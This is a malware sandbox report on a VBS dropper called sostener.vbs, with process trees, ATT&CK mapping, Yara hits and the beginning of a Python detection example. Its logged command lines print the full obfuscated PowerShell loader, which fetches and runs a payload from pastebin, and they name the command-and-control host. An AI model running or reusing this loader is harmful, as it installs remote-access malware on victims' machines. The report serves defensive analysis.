                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10AA008
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B95008
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( 
[system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( 
[system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\System32\wscript.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: RegAsm.exe, 00000007.00000002.3345509657.000000000166B000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                Source: Yara matchFile source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.287005f0550.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.272d6990dc0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.287005ed138.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.287005f0550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.272d698d9a8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2176643102.00000287005E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2381808798.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2403141075.00000272D6986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3349422989.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6400, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6128, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7308, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara matchFile source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.287005f0550.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.272d6990dc0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.287005ed138.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.287005f0550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.272d698d9a8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2176643102.00000287005E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2381808798.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2403141075.00000272D6986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3349422989.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6400, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6128, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7308, type: MEMORYSTR
                MITRE ATT&CK Matrix (a number in front of a technique is the report's hit-count badge for that technique; techniques without a number carry none)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: 221 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: 11 Windows Management Instrumentation; 1 Native API; 1 Exploitation for Client Execution; 2 Command and Scripting Interpreter; 2 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: 221 Scripting; 1 DLL Side-Loading; 2 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: 1 DLL Side-Loading; 211 Process Injection; 2 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 31 Obfuscated Files or Information; 3 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 131 Virtualization/Sandbox Evasion; 211 Process Injection
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: 2 File and Directory Discovery; 13 System Information Discovery; 121 Security Software Discovery; 1 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; Remote System Discovery; System Owner/User Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: 1 Web Service; 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 23 Application Layer Protocol; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                Behavior Graph ID: 1524706  Sample: sostener.vbs  Startdate: 03/10/2024  Architecture: WINDOWS  Score: 100

                Contacted hosts: toskaadmx.duckdns.org (Uses dynamic DNS services); pastebin.com (Connects to a pastebin service, likely for C&C); 5 other IPs or domains
                Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 22 other signatures

                Process tree, first chain (the sample opened by the script host):
                wscript.exe
                    Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
                    └─ powershell.exe
                        Signatures: Suspicious powershell command line found; Suspicious execution chain found; Found suspicious powershell code related to unpacking or dynamic code loading; Wscript called in batch mode (suppress errors)
                        ├─ powershell.exe
                        │   Network: pastebin.com 104.20.4.235 port 443 (CLOUDFLARENET, United States; ephemeral source ports 49704, 49705); paste.ee 188.114.96.3 port 443 (CLOUDFLARENET, European Union; ephemeral source ports 49711, 49728); 2 other IPs or domains
                        │   Dropped: ___win____________...________-------.lnk (MS)
                        │   Signatures: Writes to foreign memory regions; Injects a PE file into a foreign process
                        │   ├─ powershell.exe
                        │   │   Dropped: C:\Users\...\sostener.vbs:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\sostener.vbs (Unicode)
                        │   ├─ RegAsm.exe
                        │   │   Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        │   └─ RegAsm.exe
                        │       Network: toskaadmx.duckdns.org 46.246.14.3 port 7000 (PORTLANE, www.portlane.com, Sweden; ephemeral source port 49712)
                        └─ conhost.exe

                Process tree, second chain (started directly as powershell.exe):
                powershell.exe
                    Signatures: Wscript called in batch mode (suppress errors)
                    ├─ wscript.exe
                    │   Signatures: Wscript starts Powershell (via cmd or directly)
                    │   └─ powershell.exe
                    │       Signatures: Suspicious powershell command line found
                    │       ├─ powershell.exe
                    │       │   Network: 3.5.25.83 port 443 (AMAZON-AES, United States; ephemeral source port 49724)
                    │       │   Signatures: Writes to foreign memory regions; Injects a PE file into a foreign process
                    │       │   ├─ powershell.exe
                    │       │   └─ RegAsm.exe
                    │       └─ conhost.exe
                    └─ conhost.exe
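The process tree above is the detection opportunity: a script host starting PowerShell, a second PowerShell stage that decodes and loads code in memory, and RegAsm.exe (a .NET framework utility that normally never talks to the network) connecting out on port 7000. The Python below is an added example, not code from this report or from the sample: it models that chain as process-creation events and runs a handful of rules over them. Every PID, command line, file path, IP address (TEST-NET-2) and paste URL in it is a constructed placeholder; only the shape of the chain follows the graph.

```python
"""Detect the execution chain from the behavior graph over constructed events.

Added example, not code from the Joe Sandbox report or from the sample. The
events mirror the report's tree (wscript.exe -> powershell.exe -> powershell.exe
-> RegAsm.exe, RegAsm.exe then connecting to port 7000), but every PID, command
line, path, IP and paste URL below is a constructed placeholder.
"""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str                      # lowercase image basename
    cmdline: str = ""
    dest_ip: Optional[str] = None   # outbound connection made by the process, if any
    dest_port: Optional[int] = None


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# .NET framework utilities commonly used as injection targets; RegAsm.exe is the one in the report.
NET_UTILITIES = {"regasm.exe", "regsvcs.exe", "installutil.exe"}
WEB_PORTS = {80, 443}
PASTE_HOSTS = ("pastebin.com", "paste.ee")
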